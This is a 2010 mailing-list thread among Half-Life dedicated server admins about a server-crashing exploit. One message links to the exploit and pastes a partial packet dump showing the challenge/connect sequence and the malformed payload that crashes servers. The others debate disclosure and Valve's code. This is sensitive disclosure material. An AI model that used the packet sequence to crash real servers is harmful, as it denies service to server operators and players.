The code is 7 years old ;) Thanks, - Saul.
On 4 March 2010 22:09, Daniel Vogel <[email protected]> wrote: > I'm wondering what the hell the developer of that code was thinking... > "Oh, yes, there is the possibility of an invalid package, what do we do > then? Let's just kill the whole server... return;" > > :( > > -----Original Message----- > From: [email protected] > [mailto:[email protected]] On Behalf Of Cc2iscooL > Sent: Donnerstag, 4. März 2010 23:00 > To: Half-Life dedicated Linux server mailing list > Subject: Re: [hlds_linux] HLDS exploit ? > > It's kind of a double-edged sword really. Posting it makes Valve aware and > more apt to respond to it, but in the meantime it will circulate around the > internets and you'll have a bunch of crashing servers for the next few > days. > > On Thu, Mar 4, 2010 at 3:52 PM, EkaInfinitos <[email protected]> > wrote: > > > Thanks again for posting details about this vulnerability. > > > > Perhaps the disclosure will garner a expedited solution from Valve... > > > > > > -----Original Message----- > > From: [email protected] > > [mailto:[email protected]] On Behalf Of Damian > > Klimek > > Sent: Thursday, March 04, 2010 1434 > > To: Half-Life dedicated Linux server mailing list > > Subject: Re: [hlds_linux] HLDS exploit ? > > > > Oh, i mispelled my address > > > > should be > > > > http://damianklimek.pl/hlds_exploit/ > > > > Also - dump of running of vcrash in .pcap [Wireshark format] > > > > Interesting in packets : 101,103,104,107,108. > > > > 22:29 -> > > 22:29 > > 22:29 getchallenge valve > > 22:29 > > 22:29 <- > > 22:29 > > 22:29 A00000000 729366743 2 > > 22:29 > > 22:29 -> > > 22:29 > > 22:29 connect 48 729366743 > > "\prot\3\unique\-1\raw\steam\cdkey\19e5f1e722f4ab6d0d41c82f89c65295" > > 22:29 > > > > > > "\_cl_autowepswitch\1\bottomcolor\6\cl_dlmax\256\cl_lc\1\cl_lw\1\cl_updatera > > te\20\model\gordon\name > > 22:29 \uKo8mqLIp6\topcolor\30\rate\25000" > > 22:29 HjNuHL"K0 > > 22:29 -FRNd}K*KY"*Y,t!F%q_kIhtv2IW|0-rYz#2WL0F$> > > 22:29 V-9vDCgmY[b2|ebEE*~oC"""}# > > 22:29 > > 22:29 <- > > 22:29 > > 22:29 B 616 "83.11.32.104:61402" 1 > > 22:29 > > 22:29 -> > > 22:29 > > 22:29 1E4>[F?i \D^DTDTDVT > > 22:29 > > > > > > -> = to server > > <- = from server > > > > > > Fix for this is very important - anyone minds playing Clanwar while sb > run > > this exploit ? > > > > > > -- > > Damian > > > > 2010/3/4 Saul Rennison <[email protected]>: > > > It is legal, and thanks for the sploits! LOLOZOLLOZZZ I R CRASHIN UR > > SERVAZ! > > > > > > Thanks, > > > - Saul. > > > > > > > _______________________________________________ > > To unsubscribe, edit your list preferences, or view the list archives, > > please visit: > > http://list.valvesoftware.com/mailman/listinfo/hlds_linux > > > > > > _______________________________________________ > > To unsubscribe, edit your list preferences, or view the list archives, > > please visit: > > http://list.valvesoftware.com/mailman/listinfo/hlds_linux > > > _______________________________________________ > To unsubscribe, edit your list preferences, or view the list archives, > please visit: > http://list.valvesoftware.com/mailman/listinfo/hlds_linux > > > _______________________________________________ > To unsubscribe, edit your list preferences, or view the list archives, > please visit: > http://list.valvesoftware.com/mailman/listinfo/hlds_linux > _______________________________________________ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds_linux
